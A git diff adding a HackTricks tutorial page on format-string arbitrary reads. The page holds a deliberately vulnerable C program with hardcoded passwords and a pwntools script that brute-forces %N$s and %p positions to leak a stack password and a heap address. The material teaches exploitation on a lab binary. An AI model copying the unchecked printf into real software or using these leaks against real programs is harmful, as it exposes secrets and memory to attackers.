diff --git a/.gitbook/assets/image (1225).png b/.gitbook/assets/image (1225).png
new file mode 100644
index 000000000..b0a1f83a4
Binary files /dev/null and b/.gitbook/assets/image (1225).png differ
diff --git a/.gitbook/assets/image (1226).png b/.gitbook/assets/image (1226).png
new file mode 100644
index 000000000..66c23406f
Binary files /dev/null and b/.gitbook/assets/image (1226).png differ
diff --git a/.gitbook/assets/image (1227).png b/.gitbook/assets/image (1227).png
new file mode 100644
index 000000000..47298f9e6
Binary files /dev/null and b/.gitbook/assets/image (1227).png differ
diff --git a/.gitbook/assets/image (1228).png b/.gitbook/assets/image (1228).png
new file mode 100644
index 000000000..2cb50f892
Binary files /dev/null and b/.gitbook/assets/image (1228).png differ
diff --git a/.gitbook/assets/image (1229).png b/.gitbook/assets/image (1229).png
new file mode 100644
index 000000000..ffbd0b31e
Binary files /dev/null and b/.gitbook/assets/image (1229).png differ
diff --git a/.gitbook/assets/image (1230).png b/.gitbook/assets/image (1230).png
new file mode 100644
index 000000000..49c6c459e
Binary files /dev/null and b/.gitbook/assets/image (1230).png differ
diff --git a/.gitbook/assets/image (1231).png b/.gitbook/assets/image (1231).png
new file mode 100644
index 000000000..545fcdfaf
Binary files /dev/null and b/.gitbook/assets/image (1231).png differ
diff --git a/.gitbook/assets/image (1232).png b/.gitbook/assets/image (1232).png
new file mode 100644
index 000000000..a3ec7d605
Binary files /dev/null and b/.gitbook/assets/image (1232).png differ
diff --git a/.gitbook/assets/image (1233).png b/.gitbook/assets/image (1233).png
new file mode 100644
index 000000000..4d9c81fde
Binary files /dev/null and b/.gitbook/assets/image (1233).png differ
diff --git a/.gitbook/assets/image (1234).png b/.gitbook/assets/image (1234).png
new file mode 100644
index 000000000..21b3b1ba6
Binary files /dev/null and b/.gitbook/assets/image (1234).png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index 7edb398d4..1cc896174 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -715,6 +715,7 @@
* [Array Indexing](binary-exploitation/array-indexing.md)
* [Integer Overflow](binary-exploitation/integer-overflow.md)
* [Format Strings](binary-exploitation/format-strings/README.md)
+ * [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
* [Heap](binary-exploitation/heap/README.md)
* [Use After Free](binary-exploitation/heap/use-after-free.md)
diff --git a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
new file mode 100644
index 000000000..68ef4728b
--- /dev/null
+++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@@ -0,0 +1,106 @@
+# Format Strings - Arbitrary Read Example
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Code
+
+```c
+#include
+#include
+
+char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
+
+int main() {
+ char stack_password[20] = "secretStackPass"; // Password in stack
+ char input1[20], input2[20];
+
+ printf("Enter first password: ");
+ scanf("%19s", input1);
+
+ printf("Enter second password: ");
+ scanf("%19s", input2);
+
+ // Vulnerable printf
+ printf(input1);
+ printf("\n");
+
+ // Check both passwords
+ if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
+ printf("Access Granted.\n");
+ } else {
+ printf("Access Denied.\n");
+ }
+
+ return 0;
+}
+```
+
+Compile it with:
+
+```bash
+clang -o fs-read fs-read.c -Wno-format-security
+```
+
+### Read from stack
+
+The **`stack_password`** will be stored in the stack because it's a local variable, so just abusing printf to show the content of the stack is enough. This is an exploit to BF the first 100 positions to leak the passwords form the stack:
+
+```python
+from pwn import *
+
+for i in range(100):
+ print(f"Try: {i}")
+ payload = f"%{i}$s\na".encode()
+ p = process("./fs-read")
+ p.sendline(payload)
+ output = p.clean()
+ print(output)
+ p.close()
+```
+
+In the image it's possible to see that we can leak the password from the stack in the `10th` position:
+
+
+
+
+
+Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%5$p`:
+
+
+
+
+
+
+
+The difference between the leaked address and the address of the password is:
+
+```
+> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
+$1 = 0x126a
+```
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
.png)
.png)
.png)
.png)
.png)